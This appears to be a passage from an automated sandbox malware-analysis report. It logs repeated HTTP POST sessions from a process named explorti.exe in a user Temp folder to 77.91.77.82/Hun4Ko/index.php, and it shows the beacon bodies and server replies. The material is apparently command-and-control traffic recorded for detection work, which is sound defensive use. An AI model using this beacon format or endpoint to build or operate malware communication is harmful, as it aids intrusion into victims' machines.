                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:28.892270088 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.64978177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:29.005929947 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:29.693011999 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:29.694189072 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:29.912904024 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.64978277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:30.021086931 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:30.707417965 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:30.708545923 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:30.926227093 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.64978377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:31.037213087 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:31.722405910 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:31.727772951 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:31.945750952 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                57192.168.2.64978477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:32.068205118 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:32.755413055 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                58192.168.2.64978577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:32.764575958 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:33.462378979 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                59192.168.2.64978677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:33.586379051 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:34.272352934 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                60192.168.2.64978877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:34.401118040 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:35.099566936 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                61192.168.2.64978977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:35.108336926 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:35.842964888 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                62192.168.2.64979077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:35.963088036 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:36.663314104 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                63192.168.2.64979177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:36.672023058 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:37.360141993 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                64192.168.2.64979277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:37.481754065 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:38.180538893 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:38.187891960 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:38.407186985 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                65192.168.2.64979377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:38.531913996 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:39.200954914 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                66192.168.2.64979477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:39.210441113 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:39.890798092 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                67192.168.2.64979577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:40.031780005 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:40.711556911 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                68192.168.2.64979677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:40.720310926 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:41.396595001 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                69192.168.2.64979777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:41.507673979 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:42.191684008 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                70192.168.2.64979877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:42.200829029 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:42.910371065 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
